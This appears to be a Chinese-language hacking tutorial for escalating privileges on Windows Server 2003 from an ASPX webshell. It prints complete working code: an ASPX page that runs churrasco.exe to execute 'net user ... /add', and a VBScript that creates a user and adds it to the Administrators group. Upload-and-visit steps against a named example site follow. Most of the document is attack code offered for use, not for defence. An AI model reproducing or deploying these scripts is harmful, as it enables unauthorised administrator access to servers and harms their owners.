Aspx下03系统0day的提权方法
使用 Aspx下03系统0day的提权方法的提权成功率非常高.可是需要满足一下条件
1.webshell支持aspx
2.能执行cmd命令
3.系统盘有可写可读目录
需要使用到的工具有
1.churrasco.exe 或者 pr.exe
2.0day.aspx
3.adduser.vbs
下面是.0day.aspx的代码
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%><%@ import Namespace="System.IO" %><%@ import Namespace="System.Diagnostics" %><%@ import Namespace="System.Data" %><%@ import Namespace="System.Data.OleDb" %><%@ import Namespace="Microsoft.Win32" %><%@ import Namespace="System.Net.Sockets" %><%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %><%@ import Namespace="System.DirectoryServices" %><%System.Diagnostics.Process myP = new System.Diagnostics.Process();myP.StartInfo. RedirectStandardOutput = true;myP.StartInfo.FileName=Server.MapPath("churrasco.exe");myP.StartInfo.UseShellExecute = false;myP.StartInfo.Arguments= " \"net user 用户 密码 /add\" ";myP.Start();string output = myP.StandardOutput.ReadToEnd();Response.Write(output);%>
使用方法:
1.修改0day.aspx脚本中需要添加的帐号和密码
myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
2.上传churrasco.exe和0day.aspx到网站的程序目录
3.然后在访问0day.x文件
比如 目标沾站点是 www.exehack.net 0day.aspx上传到了网站根目录
那么我们直接访问https://www.exehack.net/0day.aspx 即可添加了帐号密码。 然后没有添加即不可用。
如果前面的方法提权不成功,那么有可能是管理员将net net1删除或者没有权限 那么即可用到以下方法:
这里要用到一个vbs的脚本 脚本代码如下
set wsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&wsnetwork.ComputerNameSet ob=GetObject(os)Set oe=GetObject(os&"/Administrators,group")Set od=ob.Create("user","用户名")od.SetPassword "密码"od.SetInfoSet of=GetObject(os&"/用户",user)oe.add os&"/用户"
这里还是需要修改一些自己设置的用户名和密码。
然后还需要将来下ASPX oday代码里面的
myP.StartInfo.Arguments= ” \”net user 用户 密码 /add\” “;
修改为:
myP.StartInfo.Arguments= ” \”adduser.vbs的绝对路径\” “;
比如路径是C:\Inetpub\wwwroot\adduser.vbs ‘注意:这里修改把绝对路径中的\ 修改为 /
比如 C:/Inetpub/wwwroot/adduser.vbs
然后最后的修改结果就是
myP.StartInfo.Arguments= ” \”C:/Inetpub/wwwroot/adduser.vbs\” “;
全部修改完成以后 还是在浏览器访问0day.aspx文件
这里需要注意的是,这种方法细节非常重要 如果大家测试没成功可以根据以上方法多尝试几次
评论